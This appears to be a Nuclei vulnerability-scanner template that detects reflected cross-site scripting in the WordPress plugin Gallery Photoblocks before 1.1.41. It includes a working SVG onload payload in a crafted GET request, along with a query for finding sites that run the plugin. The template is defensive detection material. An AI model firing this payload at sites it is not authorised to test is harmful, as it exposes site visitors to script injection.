nuclei-templates/http/vulnerabilities/wordpress/photoblocks-grid-gallery-xs...

38 lines
1.6 KiB
YAML
Raw Normal View History

2023-10-17 07:20:28 +00:00
id: photoblocks-grid-gallery-xss
info:
name: Gallery Photoblocks < 1.1.41 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
Reflected Cross-Site Scripting (XSS) is a type of web vulnerability where an attacker injects malicious scripts into a website, and the injected code gets reflected back to the user's browser, executing the script in the context of the vulnerable website.
remediation: Fixed in version 1.1.41
reference:
- https://plugins.trac.wordpress.org/changeset/2117972
- https://wpscan.com/vulnerability/5c57e78a-97b9-4e23-8935-e4c9d806c89d
- https://wordpress.org/plugins/photoblocks-grid-gallery/
2024-09-10 09:08:16 +00:00
classification:
cpe: cpe:2.3:a:wpchill:gallery_photoblocks:*:*:*:*:wordpress:*:*:*
2023-10-17 07:20:28 +00:00
metadata:
verified: true
max-request: 1
2024-09-10 08:22:50 +00:00
vendor: wpchill
2024-09-10 09:08:16 +00:00
product: gallery_photoblocks
publicwww-query: "/wp-content/plugins/photoblocks-grid-gallery/"
2023-10-17 07:20:28 +00:00
tags: wordpress,wpscan,photoblocks,wp-plugin,wp,xss
http:
- raw:
- |
GET /wp-content/plugins/photoblocks-grid-gallery/admin/partials/photoblocks-edit.php?id=%22%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "<svg/onload=alert(document.domain)>")'
2023-10-17 08:16:05 +00:00
- 'contains(body, "PhotoBlocks")'
2023-10-17 07:20:28 +00:00
condition: and
2024-09-12 05:14:01 +00:00
# digest: 490a00463044022074c9a222d040f5d4848b2bae55b03e2804d4adcd5da07aa5673f976c0ba83e730220756504155164c4c166e22730f1458753f5664f726ac63ce30c754178082c9431:922c64590222798bb761d5b6d8e72950